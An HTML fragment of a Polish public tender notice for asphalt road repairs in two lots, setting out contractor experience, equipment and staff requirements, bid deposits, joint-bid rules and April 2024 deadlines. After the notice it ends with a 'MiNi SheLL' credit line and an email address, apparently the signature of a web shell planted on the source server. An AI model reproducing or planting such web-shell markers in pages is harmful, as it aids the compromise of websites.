podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają określone przez Zamawiającego warunki udziału w<br/>postępowaniu, dotyczące:<br/>1. Zdolności do występowania w obrocie gospodarczym;<br/>• Zamawiający nie określa.<br/>2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>• Zamawiający nie określa.<br/>3. Sytuacji ekonomicznej lub finansowej;<br/>• Zamawiający nie określa.<br/>4. Zdolności technicznej lub zawodowej;<br/>Oceniając zdolność techniczną lub zawodową wykonawcy, zamawiający ustanawia następujące minimalne warunki<br/>dotyczące wykształcenia, kwalifikacji zawodowych, doświadczenia, potencjału technicznego wykonawcy lub osób<br/>skierowanych przez wykonawcę do realizacji zamówienia, umożliwiające realizację zamówienia na odpowiednim poziomie<br/>jakości.<br/>a) doświadczenie zawodowe – warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał<br/>/zakończył (rozpoczęcie mogło nastąpić wcześniej):<br/>w przypadku składania oferty na część nr 1:<br/>minimum trzy zamówienia (roboty budowlane), o wartości min. 20 000,00 zł każde, porównywalne z przedmiotem<br/>zamówienia, tj. remont dróg publicznych klasy technicznej min. L w technologii „mieszanką mineralno-asfaltową”. Za<br/>wykonane uznane zostaną zadania zakończone i potwierdzone np. referencjami, poświadczeniem, protokołem zdawczo -<br/>odbiorczym lub innym równoważnym dokumentem (wg proponowanego załącznika nr 3 do SWZ);<br/>w przypadku składania oferty na część nr 2:<br/>minimum trzy zamówienia (roboty budowlane), o wartości min. 45 000,00 zł każde, porównywalne z przedmiotem<br/>zamówienia, tj. remont dróg publicznych klasy technicznej min. L w technologii „emulsją asfaltową i grysami”. Za wykonane<br/>uznane zostaną zadania zakończone i potwierdzone np. referencjami, poświadczeniem, protokołem zdawczo - odbiorczym<br/>lub innym równoważnym dokumentem<br/>(wg proponowanego załącznika nr 3 do SWZ).<br/>W przypadku składania oferty na więcej niż jedną cześć zamówienia Zamawiający dopuszcza, aby Wykonawca w celu<br/>spełniania warunków udziału w postępowaniu posłużył się tym samym doświadczeniem dla więcej niż jednej części, pod<br/>warunkiem, że doświadczenie to spełnia warunki odrębnie jednocześnie dla każdej z części, na którą składa ofertę.<br/>b) potencjał techniczny - Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że w okresie realizacji zamówienia<br/>będzie dysponował min.:<br/>• w przypadku składania oferty na część nr 1:<br/>- samochodem do transportu mieszanki - 1 szt,<br/>- walcem drogowym 1,6 t - 1 szt,<br/>(wg proponowanego załącznika nr 4 do SWZ);<br/>• w przypadku składania oferty na część nr 2:<br/>- remonterem - 1 szt,<br/>(wg proponowanego załącznika nr 4 do SWZ);<br/>c) kadra techniczna - Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że w okresie realizacji zamówienia będzie<br/>dysponował min.:<br/>• Kierownikiem Budowy – (min. 1 osoba) posiadającym uprawnienia budowlane* do kierowania robotami budowlanymi o<br/>specjalności drogowej<br/>z minimalnym doświadczeniem - 2 lata (ilość lat doświadczenia liczona od daty wystawienia uprawnień budowlanych o<br/>specjalności drogowej)<br/>- (wg proponowanego załącznika nr 5 do SWZ);<br/>* Przez uprawnienia budowlane rozumie się uprawnienia do sprawowania samodzielnych funkcji technicznych w<br/>budownictwie, wydane na podstawie ustawy Prawo budowlane z dnia 7 lipca 1994 r. (t.j. Dz.U.2023 poz. 682 ze zm.) oraz<br/>Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r.<br/>w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019<br/>poz. 831). Dopuszcza się uprawnienia równoważne do powyższych wydane na podstawie wcześniej obowiązujących<br/>przepisów prawa. W przypadku obywateli państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej<br/>muszą oni spełniać wymogi określone w art. 12a ustawy Prawo budowlane, z których wynika, że samodzielne funkcje techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane<br/>na zasadach określonych w przepisach ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2023 r. poz. 334).<br/>Zamawiający dopuszcza przedstawienie tej samej osoby do pełnienia obowiązków kierownika budowy dla obu części<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany do wniesienia wadium w wysokości:<br/>Część 1 - 4 900 zł (słownie: cztery tysiące dziewięćset złotych 00/100).<br/>Część 2 - 1 000 zł (słownie: jeden tysiąc złotych 00/100). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy<br/>w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty i złożone w oryginale w takiej samej<br/>formie, jak składana oferta (tj. w formie elektronicznej podpisanej kwalifikowanym podpisem elektronicznym lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii<br/>(skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia<br/>sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14.02.1991 r. – Prawo o notariacie, które to poświadczenie notariusz<br/>opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego<br/>uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy.<br/>Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w pkt 8.1<br/>ROZDZIAŁU I SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane wykonają poszczególni wykonawcy.<br/>Pełnomocnik pozostaje w stałym kontakcie z Zamawiającym, w toku postępowania zwraca się do Zamawiającego z<br/>wszelkimi sprawami i do niego Zamawiający kieruje informacje, korespondencję itp.<br/>Przed podpisaniem umowy (w przypadku wyboru oferty wspólnej jako najkorzystniejszej) Wykonawcy składający ofertę<br/>wspólną mają obowiązek przedstawić Zamawiającemu umowę konsorcjum / umowę spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Umowa zostanie zawarta w wyznaczonym przez Zamawiającego terminie i miejscu.<br/>Zamawiający wymaga, aby Wykonawca zawarł z nim umowę na zasadach określonych we wzorze umowy, określonym w<br/>ROZDZIALE II SWZ.<br/>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano<br/>wyboru Wykonawcy, chyba że wystąpią okoliczności których nie można było wcześniej przewidzieć, a które przemawiają za<br/>koniecznością zmiany postanowień umowy określone we wzorze umowy zgodnie ROZDZIAŁEM II SWZ oraz art. 455<br/>ustawy Pzp.<br/>Wykonawca zobowiązany jest wykazać zaistnienie okoliczności wskazanych we wzorze umowy poprzez przedłożenie<br/>stosownych ekspertyz, opinii, dokumentów, itp. z których będzie wynikać konieczność zmiany umowy.<br/>Wszelkie istotne zmiany treści umowy wymagają zgody obydwu stron i formy pisemnej w postaci aneksu pod rygorem<br/>nieważności.<br/>Wprowadzenie zmian nieistotnych w umowie wymagają formy pisemnej pod rygorem nieważności.<br/>Podpisanie aneksu do umowy wprowadzającego zmiany istotne powinno być poprzedzone, pod rygorem nieważności,<br/>sporządzeniem protokołu konieczności zawierającego uzasadnienie.<br/>Konsekwencją zmiany umowy (aneksowania) może być w szczególności zmiana terminu zakończenia realizacji zadania,<br/>wydłużenie terminów obowiązywania zabezpieczenia należytego wykonania umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-05 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/zdp_lezajsk</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-05 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com